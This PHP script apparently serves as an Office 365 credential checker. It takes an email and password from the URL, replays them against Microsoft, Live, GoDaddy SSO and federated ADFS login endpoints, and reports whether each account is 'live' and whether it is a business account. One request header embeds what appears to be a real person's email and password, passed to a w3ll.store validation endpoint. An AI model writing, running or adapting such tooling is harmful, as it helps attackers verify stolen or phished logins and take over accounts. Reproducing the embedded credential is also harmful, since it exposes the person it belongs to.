<?php
	$email = $_GET['email'];
	$password = $_GET['pass'];
	$status = array();
	// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
	$ch = curl_init();

	curl_setopt($ch, CURLOPT_URL, 'https://login.microsoftonline.com/');
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

	$result = curl_exec($ch);
	if (curl_errno($ch)) {
	    echo 'Error:' . curl_error($ch);
	}
	curl_close($ch);

	preg_match('/(?<="sFT":")[^"]*/', $result, $sFT);
	preg_match('/(?<="sCtx":")[^"]*/', $result, $sCtx);
	preg_match('/(?<="canary":")[^"]*/', $result, $canary);

	$sFT = $sFT[0];
	$sCtx = $sCtx[0];
	$canary = $canary[0];


	// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
	$ch = curl_init();

	curl_setopt($ch, CURLOPT_URL, 'https://login.microsoftonline.com/common/GetCredentialType?mkt=en-US');
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"username\":\"$email\",\"isOtherIdpSupported\":false,\"checkPhones\":false,\"isRemoteNGCSupported\":true,\"isCookieBannerShown\":false,\"isFidoSupported\":true,\"originalRequest\":\"rQIIAXWRu27TUACG49xIKwSFBcYKMSE5Ob7kOIlUpLipHSex3TRXh6Eyie3Y2MexfRI3mZHogtS5CAkhJKSKiQkx8AAdaFd4AsSAEBMjyQOw_NM3_Pq-RykqT1Uesgxb1LmnZbKsQ4ZkyxQgdZaGJFNkIEMDalIETHh3e-fDy9fDOy-qjedvXkWDx6etC-LeFONZVCkU4jjO-6Zpj4382PcKnwjimiB-EMR5MmMgste5SEaQgSVY4lhYBCUWQoph8zKtxYrYBopj4ZHTt7UOAFrXoltdCygDCauiDEZd3tMcbakNDuKR11sqDj9VxB6WaxItb_hVFbQGDVeuyVipSaxMtxltJTiyKC-_J2-r1Tme0pvxQ3tl_ElumX7oHc_8CJ-n3hPqzEDSZN9HyBjj_AYzELbHOrZ9dBj6MyPEthHtOZ5oBsKwW24EVsMRJkJ9pbpxVY-WcIhBLLQEV0AN3eqdcDVGDEw4cMgp318oB003cp7FkhtIc-WQtLiedAz0xb5ZipZmR2iZJyWviOQyFwTcwhUXWHNhu2Z7R9g6CmieVQXJbYDgYyq71ur56DJ1a30K2ZPdWeibtmtcp4mf6ZsgVcnltncS9xO7ib9p4m1mXetKefLg25eO-u7X1TL3VUpcZgoO8nidg2HTmUdtUzAKrdEMOT3e6tabrFJoUnWI-Nq8H43BHlehzrLEWTb7O0uc3kh83vpf6381\",\"country\":\"ID\",\"forceotclogin\":true,\"flowToken\":\"$sFT\"}");
	curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');

	$headers = array();
	$headers[] = 'Origin: https://login.microsoftonline.com';
	$headers[] = 'Accept-Encoding: gzip, deflate, br';
	$headers[] = 'Accept-Language: en-US,en;q=0.9';
	$headers[] = 'Connection: keep-alive';
	$headers[] = 'Hpgact: 1800';
	$headers[] = 'Pragma: no-cache';
	$headers[] = 'Content-Type: application/json; charset=UTF-8';
	$headers[] = 'Hpgid: 1104';
	$headers[] = 'Accept: application/json';
	$headers[] = 'Cache-Control: no-cache';

	curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

	$result = curl_exec($ch);
	if (curl_errno($ch)) {
	    echo 'Error:' . curl_error($ch);
	}
	curl_close($ch);

	$status['live'] = false;
	$status['is_business'] = false;

	if(strpos($result, 'FederationRedirectUrl') !== false)
	{
		$status['live'] = true;
		$status['is_business'] = true;
		$redirect = 1;
		preg_match('/(?<="FederationRedirectUrl":")[^"]*/', $result, $fed);
		$store = $fed[0];
		if (strpos($result, 'sso.godaddy.com') !== false) {
			$store = str_replace("https://sso.godaddy.com/", "https://sso.godaddy.com/v1/", $store);
    		$godaddy = 1;
		}

	}
	else if (strpos($result, '"IfExistsResult":5') !== false) {
    	$status['live'] = true;
	}
	else if (strpos($result, '"IfExistsResult":1') !== false) {
    	$double = 1;
    	$status['is_business'] = true;
    	$status['live'] = true;
	}
	else if(strpos($result, '"IfExistsResult":0') !== false || strpos($result, '"IfExistsResult":6') !== false)
	{
		$status['live'] = true;
		$status['is_business'] = true;
	}
	if($double == 1){
		// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
		$ch = curl_init();

		curl_setopt($ch, CURLOPT_URL, 'https://login.microsoftonline.com/common/login');
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, "i13=0&login=$email&loginfmt=$email&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=$password&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=$canary&ctx=$sCtx&hpgrequestid=9799cd88-6ea7-4cfc-aeb2-4dcb20034a03&flowToken=$sFT&PPSX=&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=0&isSignupPost=1&i2=1&i17=&i18=&i19=9189");
		curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');

		$headers = array();
		$headers[] = 'Connection: keep-alive';
		$headers[] = 'Cache-Control: max-age=0';
		$headers[] = 'Upgrade-Insecure-Requests: 1';
		$headers[] = 'Origin: https://w3ll.store';
		$headers[] = 'Content-Type: application/x-www-form-urlencoded';
		$headers[] = 'User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1';
		$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
		$headers[] = 'Sec-Fetch-Site: same-origin';
		$headers[] = 'Sec-Fetch-Mode: navigate';
		$headers[] = 'Sec-Fetch-User: ?1';
		$headers[] = 'Sec-Fetch-Dest: document';
		$headers[] = 'Referer: https://w3ll.store/api/office-val?email=brian.ellis@iimetro.com.au&pass=Buffie8238';
		$headers[] = 'Accept-Language: en-US,en;q=0.9';
		$headers[] = 'Cookie: brcap=0; PHPSESSID=n3mqb6fthdij42bob315v444pn; clrc={%2218850%22%3a[%22Y84OH6yN%22%2c%22rCQ1FQCo%22%2c%220b9gVZOA%22%2c%227b66aBPk%22]%2c%2218852%22%3a[%22YMcTWH6J%22%2c%22vLmkZEso%22]}; wlidperf=FR=L&ST=1628770432083';
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

		$result = curl_exec($ch);
		if (curl_errno($ch)) {
		    echo 'Error:' . curl_error($ch);
		}
		curl_close($ch);

		echo $result;
		if (strpos($result, 'Your account or password is incorrect') !== false || strpos($result, 'Verify your identity') !== false || strpos($result, 'You cannot access this right now') !== false || strpos($result, 'More information required') !== false) {
    		$status['live'] = false;
		}
		else if (strpos($result, 'Update your password') !== false){
			$status['live'] = true;
		}
	}
	else if($godaddy != 1 && $redirect != 1 && $status['is_business'] == true && $status['live'] == true){

		// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, 'https://login.microsoftonline.com/common/login');
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, "i13=0&login=$email&loginfmt=$email&type=11&LoginOptions=4&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=$password&ps=$password&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=$canary&ctx=$sCtx&hpgrequestid=9221584f-7240-4740-b17c-1e86850e0f00&flowToken=$sFT&PPSX=&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=1&IsFidoSupported=1&i2=1&i17=&i18=&i19=38025'");
		curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
		$headers = array();
		$headers[] = 'Connection: keep-alive';
		$headers[] = 'Pragma: no-cache';
		$headers[] = 'Cache-Control: no-cache';
		$headers[] = 'Origin: https://login.microsoftonline.com';
		$headers[] = 'Upgrade-Insecure-Requests: 1';
		$headers[] = 'Content-Type: application/x-www-form-urlencoded';
		$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36';
		$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8';
		$headers[] = 'Referer: https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3d-NVc_0xM7W-F562KiA9QLUhOHXdjvRJjTFZvT-S8jBJml-eKwsJNB5I8c1JYO7i-GcwuYcqyLPDTDjknqER31HBGXP7Tr0khaDxR9PzwKkQKIsPiXzhotOM04yjP0-85&nonce=636871367486445315.MGNlYjA4NTUtNTgyMy00MDE4LWEzZjktMzcyMDg5NWIwNmM5ZGUzNThmNWItNzIzOS00MTcwLWI0YWEtOTgyMjE4OGU1ZjUz&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=en-US&mkt=en-US&client-request-id=3243e009-994a-4fda-a797-443e063c2cb7';
		$headers[] = 'Accept-Encoding: gzip, deflate, br';
		$headers[] = 'Accept-Language: en-US,en;q=0.9';
		$headers[] = 'Cookie: x-ms-gateway-slice=prod; stsservicecookie=ests; AADSSO=NA|NoExtension; esctx=AQABAAAAAACEfexXxjamQb3OeGQ4Gugvocq7HTlpivMFMqw7rAdYIX-379jRn9CVIsbmrYLHqA3duJkUxKJTszQt0d0Q6LtWkrBmEaV1Pzqhzi-AZ0UkK5TqobxCRIrZD2zLzdr75TgvlBieVsVAFwIowcvJVinBkhvXTrWUiv4xMI3qaR5AX_UVXALpS1z4-q9JB2ShtfggAA; buid=AQABAAEAAACEfexXxjamQb3OeGQ4GugvSRekKAyhj_vH-b7iUWeecdTQbPccc8xz8GJPTwS55imF2jhDiU1lDiBh6TTRdIyN3uz13GK6p_fczATyNW6z2P6xn-BL6ohV1TqDVYCcrxsgAA; fpc=AqgYRiRgWE9Cs0XixugDIrp9Hyj2AQAAANKUDNQOAAAA; wlidperf=FR=L&ST=1551539989377';
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

		$result = curl_exec($ch);
		if (curl_errno($ch)) {
		    echo 'Error:' . curl_error($ch);
		}
		curl_close($ch);

		if (strpos($result, 'Your account or password is incorrect') !== false || strpos($result, 'Verify your identity') !== false || strpos($result, 'You cannot access this right now') !== false || strpos($result, 'More information required') !== false) {
    		$status['live'] = false;
		}
		else if (strpos($result, 'Update your password') !== false){
			$status['live'] = true;
		}
	}
	else if($godaddy == 1 && $status['is_business'] == true && $status['live'] == true){
		// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
		$ch = curl_init();

		curl_setopt($ch, CURLOPT_URL, $store);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, "name=$email&password=$password&AuthMethod=FormsAuthentication");
		curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');

		$headers = array();
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

		$result = curl_exec($ch);

		if (curl_errno($ch)) {
		    echo 'Error:' . curl_error($ch);
		}
		curl_close($ch);
		if (strpos($result, 'You entered an incorrect username or password.') !== false) {
    		$status['live'] = false;
		}
	}
	else if($redirect == 1 && $status['is_business'] == true && $status['live'] == true){
		// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
		$ch = curl_init();

		curl_setopt($ch, CURLOPT_URL, $store);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, "UserName=$email&Password=$password&AuthMethod=FormsAuthentication");
		curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');

		$headers = array();
		$headers[] = 'Connection: keep-alive';
		$headers[] = 'Cache-Control: max-age=0';
		$headers[] = 'Sec-Ch-Ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"';
		$headers[] = 'Sec-Ch-Ua-Mobile: ?0';
		$headers[] = 'Upgrade-Insecure-Requests: 1';
		$headers[] = 'Origin: https://adfs.cms.k12.nc.us';
		$headers[] = 'Content-Type: application/x-www-form-urlencoded';
		$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36';
		$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
		$headers[] = 'Sec-Fetch-Site: same-origin';
		$headers[] = 'Sec-Fetch-Mode: navigate';
		$headers[] = 'Sec-Fetch-User: ?1';
		$headers[] = 'Sec-Fetch-Dest: document';
		$headers[] = 'Accept-Language: en-US,en;q=0.9';
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

		$result = curl_exec($ch);
		if (curl_errno($ch)) {
		    echo 'Error:' . curl_error($ch);
		}
		curl_close($ch);

		if (strpos($result, 'Incorrect user ID or password. Type the correct user ID and password, and try again') !== false) {
    		$status['live'] = false;
		}
	}
	else if($status['is_business'] == false && $status['live'] == true){
		// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
		$ch = curl_init();

		curl_setopt($ch, CURLOPT_URL, 'https://login.live.com/ppsecure/post.srf');
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, "flowToken=$sFT&i13=0&login=$email&loginfmt=$email&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=$password&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=$canary&ctx=$sCtx&hpgrequestid=&PPFT=DSqb%21VulCbU2kPo884Kobx9xOw60Y06B6H4MsNcy44imsCQDYWQIeoCJGilrflfsR6FOkCyXNhuLZNuK2I9TvvJXoDQMxM8ap4SdtgZ5firq1vljD17cqNv*ZtG5LMNAdy%21xN74p7Jl92kD7lSPjRq*5vYKYRpmZcTLnCtszma1X8hsHMv93cRaBenLBPZmbeX1lHCWC5A9Mc0d6LV2ZzYA%24&PPSX=Passpor&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&i2=1&i17=0&i18=__ConvergedLoginPaginatedStrings%7C1%2C__OldConvergedLogin_PCore%7C1%2C&i19=3997'");
		curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');

		$headers = array();
		$headers[] = 'Connection: keep-alive';
		$headers[] = 'Pragma: no-cache';
		$headers[] = 'Cache-Control: no-cache';
		$headers[] = 'Origin: https://login.live.com';
		$headers[] = 'Upgrade-Insecure-Requests: 1';
		$headers[] = 'Content-Type: application/x-www-form-urlencoded';
		$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36';
		$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8';
		$headers[] = 'Accept-Encoding: gzip, deflate, br';
		$headers[] = 'Accept-Language: en-US,en;q=0.9';
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

		$result = curl_exec($ch);
		if (curl_errno($ch)) {
		    echo 'Error:' . curl_error($ch);
		}
		curl_close($ch);

		if (strpos($result, 'JavaScript required to sign in') !== false) {
    		$status['live'] = true;
		}
		else{
			$status['live'] = false;
		}
	}
	$status['result'] = htmlentities($result);
	echo json_encode($status);